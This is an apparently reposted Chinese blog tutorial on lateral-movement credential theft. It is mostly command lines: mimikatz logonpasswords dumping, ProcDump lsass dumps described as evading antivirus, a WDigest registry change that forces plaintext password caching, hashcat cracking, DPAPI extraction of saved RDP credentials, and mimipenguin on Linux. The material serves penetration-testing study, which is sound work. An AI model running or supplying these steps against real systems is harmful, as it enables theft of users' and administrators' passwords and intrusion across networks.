admin管理员组文章数量:1637684
Windows-Mimikatz适用环境:
微软为了防止明文密码泄露发布了补丁KB2871997,关闭了Wdigest功能。
当系统为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,
此时可以通过修改注册表的方式抓取明文,但需要用户重新登录后才能成功抓取。(也就是强制开启内存缓存)
Windows密码读取
1、在线读
https://github/gentilkiwi/mimikatz
mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords" 也就是cs上面的一键读取的操作
2、离线读(绕过防护)
ProcDump - Sysinternals | Microsoft Learn
实验:针对防护拦截:针对防护拦截(Minikatz被拦截)
Procdump是微软官方的工具,可在命令行将lsass导出且杀软不会拦截
Procdump.exe -accepteula -ma lsass.exe lsass.dmp
在本地的mimikatz中执行
mimikatz.exe "sekurlsa::minidump lsass.dmp"
sekurlsa::logonPasswords full
3、针对高版本但有存储:管理员登陆过,密码留在了内存中
(和上面的操作一样,只不过是如果有人在这段时间登录了缓存中就会留有明文的账号密码)
Procdump.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz.exe "sekurlsa::minidump lsass.DMP"
sekurlsa::logonPasswords full
4、解决高版本
修改注册表+强制锁屏+等待系统管理员重新登录+截取明文密码
修改注册表来让Wdigest Auth保存明文口令方式
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\ /v UseLogonCredential /t REG_DWORD /d 1
先Windows 2012R2 DC 上面进行了mimikatz读取,发现读取不到任何的密码只能读取hash
查看目前的注册表
然后输入
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\ /v UseLogonCredential /t REG_DWORD /d 1
可以发现新增了一个UseLogonCredential
然后重新登录了一下账号再使用mimikatz进行读取可以读取到登录的用户和密码了
修改为原来的样子使用命令,将添加的值删除
reg delete HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\ /v UseLogonCredential
另外就是要想修改这个注册表还得是管理员的权限才可,并且修改完后也得等着其他人来登录才可以获取到密码,需要等待。有点像那个什么ntlm中继
5、hash破解
直接到cmd5解密的网站去解密,或者使用hashcat工具进行字典暴力破解,hashcat可以使用字典也可以使用蛮力指定进行爆破,速度非常快
6、RDP密码
查看RDP连接记录
cmdkey /list
首先电脑需要进行远程连接一台主机,然后win7上面需要勾选这个保存凭据的复选框,不勾选就不会保存凭据。另外这里查看票据的时候不同用户的可能只能查看到自己的票据
查找本地的Credentials:
dir /a %userprofile%\appdata\local\microsoft\credentials\*
Credentials记录guidMasterKey值:
mimikatz dpapi::cred /in:C:\Users\admin\appdata\local\microsoft\credentials\78F0250D765278EFC6E00165AB0DF90F
找到guidMasterKey对应的MasterKey:
b66d343e-eb55-47c4-a1fd-e81710149869
mimikatz sekurlsa::dpapi
解密指定的MasterKey凭据:
mimikatz dpapi::cred /in:C:\Users\admin\appdata\local\microsoft\credentials\78F0250D765278EFC6E00165AB0DF90F /masterkey:c6da1346bcf86591095a58c1b9393b08fe65d6ff0c32d7e17d5c472406a8ca09e1af2386eda1932c23311fff0e4a8066c578a885f0f069cc9ca1e2d158a320a9
7、Linux-mimipenguin
https://github/huntergregal/mimipenguin
适用版本
Kali 4.3.0 (rolling) x64 (gdm3)
Ubuntu Desktop 12.04 LTS x64 (Gnome Keyring 3.18.3-0ubuntu2)
Ubuntu Desktop 16.04 LTS x64 (Gnome Keyring 3.18.3-0ubuntu2)
XUbuntu Desktop 16.04 x64 (Gnome Keyring 3.18.3-0ubuntu2)
VSFTPd 3.0.3-8+b1 (Active FTP client connections)
Apache2 2.4.25-3 (Active/Old HTTP BASIC AUTH Sessions)
openssh-server 1:7.3p1-1 (Active SSH connections - sudo usage)
加密方式可以通过前缀判断
但是这个工具好像用起来有点问题,而且需要root的权限运行。另外就是使用hashcat进行爆破密码,比较鸡肋。
版权声明:本文标题:138-横向移动 Win&Linux&内存离线读取&Hashcat破解&RDP&SSH存储提取 内容由热心网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:https://www.elefans.com/dianzi/1729253991a1192472.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论